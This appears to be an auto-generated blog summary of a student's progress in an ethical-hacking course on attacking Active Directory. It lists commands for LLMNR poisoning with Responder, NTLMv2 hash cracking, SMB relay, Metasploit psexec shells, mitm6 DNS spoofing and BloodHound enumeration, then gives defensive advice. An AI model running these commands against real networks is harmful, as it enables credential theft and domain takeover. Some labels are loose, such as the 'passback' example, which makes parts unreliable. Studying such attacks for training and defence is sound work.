Listen to this Post
In this article, Todd Mattran shares his progress in the PEH (Practical Ethical Hacking) course, specifically focusing on attacking Active Directory. Below are the key topics covered and verified commands/codes related to the article:
Topics Covered:
1. LLMNR Poisoning
2. Capturing Hashes with Responder
3. Cracking Hashes with HashCat
4. SMB Relay Attacks and Defenses
5. Gaining Shell Access with Metasploit
6. IPv6 DNS Takeover via mitm6
7. Passback Attacks
8. Post-Compromise Enumeration
Verified Commands and Codes:
1. LLMNR Poisoning
responder -I eth0 -wrf
This command starts Responder on the `eth0` interface to capture LLMNR and NBT-NS requests.
2. Capturing Hashes with Responder
responder -I eth0 -v
This command enables verbose mode to capture NTLMv2 hashes.
3. Cracking Hashes with HashCat
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt
This command cracks NTLMv2 hashes using HashCat and the `rockyou.txt` wordlist.
4. SMB Relay Attacks
ntlmrelayx.py -tf targets.txt -smb2support
This command performs SMB relay attacks against the targets listed in targets.txt.
5. Gaining Shell Access with Metasploit
use exploit/windows/smb/psexec set RHOSTS 192.168.1.10 set SMBUser admin set SMBPass password123 exploit
This Metasploit module exploits SMB to gain shell access.
6. IPv6 DNS Takeover via mitm6
mitm6 -d domain.local -i eth0
This command starts mitm6 to spoof IPv6 DNS responses.
7. Passback Attacks
impacket-ntlmrelayx --no-http-server -smb2support -t smb://192.168.1.20
This command relays NTLM credentials to another SMB server.
8. Post-Compromise Enumeration
bloodhound-python -d domain.local -u user -p password -gc dc.domain.local -c all
This command collects data for BloodHound to analyze Active Directory relationships.
What Undercode Say:
Active Directory attacks are a critical aspect of penetration testing, and understanding the initial attack vectors is essential for both offensive and defensive cybersecurity professionals. LLMNR poisoning and SMB relay attacks exploit inherent weaknesses in network protocols, while tools like Responder and HashCat make it easier to capture and crack credentials. Metasploit remains a powerful tool for gaining shell access, and mitm6 demonstrates the risks of IPv6 misconfigurations. Post-compromise enumeration with tools like BloodHound helps attackers understand the domain structure and escalate privileges. Defenders should focus on disabling LLMNR/NBT-NS, enforcing SMB signing, and monitoring for unusual DNS or SMB activity. Regular penetration testing and red team exercises are crucial to identifying and mitigating these vulnerabilities. For further reading, check out the following resources:
– Mitre ATT&CK Framework
– BloodHound Documentation
– HashCat Official Site
References:
initially reported by: https://www.linkedin.com/posts/todd-mattran-gogetit_passthetest-getbettereveryday-shareknowledge-activity-7296175752268390400-bgLW – Hackers Feeds
Extra Hub:
Undercode AI


